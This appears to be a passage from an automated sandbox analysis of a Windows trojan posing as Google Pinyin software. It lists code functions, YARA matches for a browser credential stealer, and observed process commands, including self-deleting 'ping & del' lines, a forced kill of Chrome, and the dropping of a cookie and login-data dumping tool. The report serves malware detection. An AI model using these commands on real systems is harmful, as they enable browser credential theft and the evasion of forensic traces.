Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00460360 1_2_00460360
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004B2370 1_2_004B2370
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0041C3F0 1_2_0041C3F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0047A410 1_2_0047A410
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004714E0 1_2_004714E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0046F4B0 1_2_0046F4B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0043E540 1_2_0043E540
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0048E560 1_2_0048E560
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0045D570 1_2_0045D570
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0044A520 1_2_0044A520
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00423530 1_2_00423530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0042F530 1_2_0042F530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00466530 1_2_00466530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004315E0 1_2_004315E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004B3660 1_2_004B3660
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004B5670 1_2_004B5670
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0042E630 1_2_0042E630
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004B66D0 1_2_004B66D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004286E0 1_2_004286E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004166B0 1_2_004166B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00493790 1_2_00493790
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000C063 3_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000B883 3_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100060F0 3_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100169BD 3_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100099E0 3_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100071F0 3_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10009257 3_2_10009257
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10010AED 3_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10008340 3_2_10008340
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000E380 3_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000ABA0 3_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000B3B0 3_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001EBD0 3_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100083F0 3_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000BC57 3_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000C483 3_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10010590 3_2_10010590
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001EDDB 3_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000FF71 3_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_00404BE4 10_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DBA0C3 23_2_00DBA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB6A1E 23_2_00DB6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB963B 23_2_00DB963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DBA7BB 23_2_00DBA7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB9B7F 23_2_00DB9B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DBB51C 23_2_00DBB51C
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: String function: 004854D0 appears 57 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: String function: 004EE38E appears 75 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: String function: 00407D80 appears 151 times
PE file contains strange resources
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611969895131.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611969895131.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: N1yprTBBXs.exe, 00000001.00000002.254699493.0000000000B90000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000001.00000002.254713165.0000000000BB0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000001.00000002.254703600.0000000000BA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs N1yprTBBXs.exe
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: N1yprTBBXs.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000003.00000002.306936855.0000000002810000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.273906003.0000000002850000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.255209572.0000000002840000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.N1yprTBBXs.exe.2840000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.6272167835D47591.exe.2810000.3.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.6272167835D47591.exe.2810000.3.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.N1yprTBBXs.exe.2840000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.N1yprTBBXs.exe.10000000.6.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6272167835D47591.exe.2850000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6272167835D47591.exe.2850000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6272167835D47591.exe.3520000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 3.2.6272167835D47591.exe.33d0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 10_2_0040CE93
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00469760 CoCreateInstance, 1_2_00469760
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0043D110 FindResourceW,LoadResource,LockResource,SizeofResource,_memmove,VerQueryValueW,FreeLibrary, 1_2_0043D110
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Login Data1611969864637 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Jump to behavior
Source: N1yprTBBXs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611969895131.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: N1yprTBBXs.exe Virustotal: Detection: 38%
Source: N1yprTBBXs.exe Metadefender: Detection: 18%
Source: N1yprTBBXs.exe ReversingLabs: Detection: 59%
Source: N1yprTBBXs.exe String found in binary or memory: GETpinyin<!-- IME Installed -->http://tools.google.com/pinyin/install.htmlhttp://tools.google.com/pinyin/uninstall.htmlsysdictpinyinversion:http://tools.google.com/service/updatesysdicthttps://tools.google.com/service/updateGooglePinyinUpdaterTrayIconpinyinpinyinsysdictGooglePinyinDict.exesysdictuserdictmodel
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File read: C:\Users\user\Desktop\N1yprTBBXs.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\N1yprTBBXs.exe 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 47001C74A82A95AF6290BD5DE31B19AD C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1611969895131.exe 'C:\Users\user\AppData\Roaming\1611969895131.exe' /sjson 'C:\Users\user\AppData\Roaming\1611969895131.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01 Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01 Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Process created: C:\Users\user\AppData\Roaming\1611969895131.exe 'C:\Users\user\AppData\Roaming\1611969895131.exe' /sjson 'C:\Users\user\AppData\Roaming\1611969895131.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: N1yprTBBXs.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: N1yprTBBXs.exe Static file information: File size 4999496 > 1048576
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: N1yprTBBXs.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11fe00
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: N1yprTBBXs.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: N1yprTBBXs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611969895131.exe, 0000000A.00000000.264783282.000000000040F000.00000002.00020000.sdmp, 1611969895131.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
